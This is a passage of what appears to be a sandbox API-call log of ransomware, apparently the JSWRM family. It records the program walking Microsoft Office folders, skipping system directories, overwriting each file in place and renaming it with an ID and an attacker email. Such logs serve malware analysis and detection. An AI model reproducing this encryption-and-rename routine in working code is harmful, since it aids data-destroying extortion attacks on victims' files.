returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2=".") returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="..") returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="...") returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="windows") returned -1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="recovery") returned -1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="perflogs") returned -1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="documents and settings") returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="system volume information") returned -1 [0129.837] lstrcmpiW (lpString1="EXITEML.ICO", lpString2="msocache") returned -1 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEML.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEML.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEML.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEML.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEML.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEML.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.838] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.838] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.840] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.840] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.840] CloseHandle (hObject=0x314) returned 1 [0129.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exiteml.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEML.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exiteml.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.841] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="EXITEMS.ICO", cAlternateFileName="")) returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2=".") returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="..") returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="...") returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="windows") returned -1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="recovery") returned -1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="perflogs") returned -1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="documents and settings") returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="system volume information") returned -1 [0129.841] lstrcmpiW (lpString1="EXITEMS.ICO", lpString2="msocache") returned -1 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEMS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEMS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEMS.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEMS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEMS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEMS.ICO", lpUsedDefaultChar=0x0) returned 11 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.842] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.842] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.842] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.845] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.845] CloseHandle (hObject=0x314) returned 1 [0129.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitems.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEMS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitems.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.849] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7a9345, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x268, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="INFOMAIL.CFG", cAlternateFileName="")) returned 1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2=".") returned 1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="..") returned 1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="...") returned 1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="windows") returned -1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="recovery") returned -1 [0129.849] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="perflogs") returned -1 [0129.850] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="documents and settings") returned 1 [0129.850] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.850] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="system volume information") returned -1 [0129.850] lstrcmpiW (lpString1="INFOMAIL.CFG", lpString2="msocache") returned -1 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMAIL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMAIL.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOMAIL.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMAIL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMAIL.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOMAIL.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infomail.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.851] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=616) returned 1 [0129.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.851] ReadFile (in: hFile=0x314, lpBuffer=0x207860, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e534*=0x260, lpOverlapped=0x0) returned 1 [0129.852] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.852] WriteFile (in: hFile=0x314, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e530*=0x260, lpOverlapped=0x0) returned 1 [0129.852] CloseHandle (hObject=0x314) returned 1 [0129.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infomail.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMAIL.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infomail.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.858] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7a9345, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="INFOML.ICO", cAlternateFileName="")) returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2=".") returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="..") returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="...") returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="windows") returned -1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="recovery") returned -1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="perflogs") returned -1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="documents and settings") returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="system volume information") returned -1 [0129.858] lstrcmpiW (lpString1="INFOML.ICO", lpString2="msocache") returned -1 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOML.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOML.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOML.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOML.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOML.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOML.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.859] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=25214) returned 1 [0129.859] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.859] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6270, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6270, lpOverlapped=0x0) returned 1 [0129.863] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.863] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6270, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6270, lpOverlapped=0x0) returned 1 [0129.863] CloseHandle (hObject=0x314) returned 1 [0129.863] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoml.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOML.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoml.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.864] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="INFOMS.ICO", cAlternateFileName="")) returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2=".") returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="..") returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="...") returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="windows") returned -1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="recovery") returned -1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="perflogs") returned -1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="documents and settings") returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="system volume information") returned -1 [0129.864] lstrcmpiW (lpString1="INFOMS.ICO", lpString2="msocache") returned -1 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMS.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMS.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOMS.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMS.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INFOMS.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOMS.ICO", lpUsedDefaultChar=0x0) returned 10 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.865] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.865] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.865] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.867] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.867] CloseHandle (hObject=0x314) returned 1 [0129.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoms.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\INFOMS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\infoms.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.869] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7a9345, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31b, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="IPM.CFG", cAlternateFileName="")) returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2=".") returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="..") returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="...") returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="windows") returned -1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="recovery") returned -1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="perflogs") returned -1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="documents and settings") returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="system volume information") returned -1 [0129.869] lstrcmpiW (lpString1="IPM.CFG", lpString2="msocache") returned -1 [0129.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.CFG", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.CFG", lpUsedDefaultChar=0x0) returned 7 [0129.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.CFG", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.CFG", lpUsedDefaultChar=0x0) returned 7 [0129.869] 